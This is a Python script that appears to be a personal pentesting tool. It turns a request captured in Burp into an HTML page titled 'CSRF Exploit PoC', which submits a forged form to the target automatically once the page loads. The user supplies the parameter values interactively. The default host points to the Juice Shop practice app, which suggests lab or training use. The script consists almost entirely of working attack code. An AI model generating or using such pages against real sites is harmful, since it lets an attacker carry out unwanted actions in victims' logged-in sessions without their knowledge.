import os
import re
from urllib.parse import parse_qs

def banner():
    banner = """
[0;37;40m [0;31;40m▄▄▄▄▄[0;37;40m  [0;31;40m▄▄▄▄▄[0;37;40m [0;31;40m▄▄▄▄▄[0;37;40m   [0;31;40m▄▄▄▄▄[0;37;40m      [0;31;40m▄▄▄[0;37;40m [0;31;40m▄▄▄[0;37;40m [0;31;40m▄▄▄▄▄[0;37;40m [0;31;40m▄▄▄▄▄[0;37;40m   [0;31;40m▄▄▄▄▄[0;37;40m [0;31;40m▄▄▄▄▄[0;37;40m  [0;31;40m▄▄▄▄▄[0;37;40m [0m
[0;91;41m▒[0;97;41m▄▀▀▀[0;91;41m░[0;37;40m [0;91;41m░[0;97;41m▄▀▀▀[0;91;41m░[0;37;40m [0;91;41m░[0;97;40m█[0;97;41m▀▀[0;97;43m▄[0;91;41m░[0;37;40m [0;91;41m░[0;97;41m▄▀▀▀[0;91;41m░[0;37;40m      [0;91;41m░[0;97;43m█[0;91;41m░[0;97;41m▄[0;91;41m░[0;97;44m█[0;91;41m░[0;37;40m [0;91;41m [0;97;41m▀[0;97;44m█[0;97;41m▀[0;91;41m░[0;37;40m [0;91;41m░[0;97;41m▀▀▀▄[0;91;41m░[0;37;40m [0;91;41m░[0;97;41m▄▀▀[0;97;44m█[0;91;41m░[0;37;40m [0;91;41m░[0;97;40m█[0;97;41m▀▀[0;97;43m▄[0;91;41m░[0;37;40m [0;91;41m░[0;97;40m█[0;97;41m▀▀[0;97;43m▄[0;91;41m░[0m
[0;91;41m▓[0;97;44m█[0;91;41m▓[0;37;40m    [0;91;41m▒[0;97;43m▀▀▀[0;97;44m█[0;91;41m▒[0;37;40m [0;91;41m▒[0;97;44m█[0;97;43m▀▀▄[0;91;40m▄[0;37;40m [0;91;41m▒[0;97;44m█[0;97;41m▀▀[0;91;41m▒[0;37;40m       [0;91;41m▒[0;97;44m█[0;91;41m▒[0;97;44m█[0;91;41m▒[0;97;44m█[0;91;41m▒[0;37;40m  [0;91;41m░[0;97;44m█[0;91;41m░[0;37;40m  [0;91;41m▒[0;97;44m█[0;97;43m▀▀▀[0;91;41m▒[0;37;40m [0;91;41m▒[0;97;44m█[0;97;43m▄▄[0;97;44m█[0;91;41m▒[0;37;40m [0;91;41m▒[0;97;44m█[0;97;43m▀▀▄[0;91;40m▄[0;37;40m [0;91;41m▒[0;97;44m█[0;91;41m░▒[0;97;44m█[0;91;41m▒[0m
[0;91;41m█[0;97;40m█[0;97;43m▄▄▄[0;91;41m▓[0;37;40m [0;91;41m▓[0;97;44m█[0;97;43m▄▄▀[0;91;41m▓[0;37;40m [0;91;41m▓[0;97;44m█[0;91;41m▓▓[0;97;40m█[0;91;41m▓[0;37;40m [0;91;41m▓[0;97;44m█[0;91;41m▒[0;37;40m         [0;91;41m▓[0;97;43m▀▄█▄[0;97;44m█[0;91;41m▓[0;37;40m [0;91;41m▒[0;97;41m▄[0;97;44m█[0;97;41m▄[0;91;41m▒[0;37;40m [0;91;41m▓[0;97;43m▀▄▄[0;97;44m█[0;91;41m▓[0;37;40m [0;91;41m▓[0;97;44m█[0;91;41m▒▓[0;97;44m█[0;91;41m▓[0;37;40m [0;91;41m▓[0;97;44m█[0;91;41m▓▓[0;97;40m█[0;91;41m▓[0;37;40m [0;91;41m▓[0;97;44m█[0;97;43m▄▄▀[0;91;41m▓[0m
[0;91;40m▀▀▀▀▀▀[0;37;40m [0;91;40m▀▀▀▀▀[0;37;40m  [0;91;40m▀▀▀▀▀▀[0;37;40m [0;91;40m▀▀▀[0;37;40m          [0;91;40m▀▀▀▀▀▀[0;37;40m [0;91;40m▀▀▀▀▀[0;37;40m  [0;91;40m▀▀▀▀▀[0;37;40m [0;91;40m▀▀▀▀▀▀[0;37;40m [0;91;40m▀▀▀▀▀▀[0;37;40m [0;91;40m▀▀▀▀▀[0;37;40m [0m

Developed by eMVee
    """
    print(banner)

def parse_burp_request(request_text):
    # Split the request based on line breaks
    lines = request_text.replace('\r\n', '\n').split('\n')
    
    if not lines or request_text.strip() == "":
        raise ValueError("The file appears to be empty.")
        
    # 1. Determine the HTTP method and the path (e.g., POST /profile)
    match_request_line = re.match(r'^([A-Z]+)\s+([^\s]+)\s+HTTP', lines[0])
    if not match_request_line:
        raise ValueError("Could not parse the HTTP request line (first line).")
    
    method = match_request_line.group(1)
    path = match_request_line.group(2)
    
    # 2. Extract the Host header for the complete URL
    host = "localhost:3000"  # Default fallback for Juice Shop
    for line in lines:
        if line.lower().startswith("host:"):
            host = line.split(":", 1)[1].strip()
            break
            
    target_url = f"http://{host}{path}"
    
    # 3. Extract the body (everything after the first empty line)
    body = ""
    for i, line in enumerate(lines):
        if line.strip() == "":
            body = "\n".join(lines[i+1:]).strip()
            break
            
    # Parse the x-www-form-urlencoded parameters into a dictionary
    raw_params = parse_qs(body)
    params = {k: v[0] for k, v in raw_params.items() if v}
    
    return method, target_url, params

def generate_csrf_html(method, target_url, params):
    form_inputs = ""
    if params:
        for name, value in params.items():
            form_inputs += f'      <input type="hidden" name="{name}" value="{value}" />\n'
    else:
        form_inputs += '      <!-- No parameters found in the body of the request -->\n'
        
    html_content = f"""<!DOCTYPE html>
<html>
  <!-- CSRF PoC Generated by Security Script -->
  <head>
    <title>CSRF Exploit PoC</title>
  </head>
  <body>
    <h1>Loading...</h1>
    <form id="csrfForm" action="{target_url}" method="{method}">
{form_inputs}
    </form>
    <script>
      // Automatically submit the form once the page is loaded
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>"""
    return html_content

def main():
    try:
        banner()
        print("=== Interactive CSRF PoC Exploit Generator ===")
        
        # 1. Ask for the Burp request file
        file_path = input("[?] Enter the path to the Burp request (.txt) file: ").strip()
        if not os.path.exists(file_path):
            print(f"[-] Error: File '{file_path}' not found.")
            return
            
        with open(file_path, "r", encoding="utf-8", errors="ignore") as f:
            request_text = f.read()

        # 2. Ask for the desired output name
        output_filename = input("[?] What should the HTML file be named? (e.g., csrf.html): ").strip()
        if not output_filename.endswith(".html"):
            output_filename += ".html"

        # Parse the request to discover parameters
        method, target_url, params = parse_burp_request(request_text)
        
        # 3. Interactively ask for data per parameter
        if params:
            print("\n[!] Parameters detected! Enter the new value (or press Enter to keep the original value):")
            for param_name, original_value in params.items():
                user_input = input(f"    -> Value for '{param_name}' (Original: '{original_value}'): ").strip()
                if user_input:
                    params[param_name] = user_input
        else:
            print("\n[!] No parameters found in the request body.")

        # 4. Generate the HTML
        html_output = generate_csrf_html(method, target_url, params)
        
        # 5. Write to file
        with open(output_filename, "w", encoding="utf-8") as f:
            f.write(html_output)
            
        # 6. Print the result to the terminal
        print(f"\n[+] Successfully saved as: {output_filename}")
        print("\n=== GENERATED HTML OUTPUT ===")
        print(html_output)
        print("==============================\n")
        
    except KeyboardInterrupt:
        print("\n\n[-] Operation cancelled by user. Exiting gracefully.")
    except Exception as e:
        print(f"[-] Error occurred during processing: {e}")

if __name__ == "__main__":
    main()
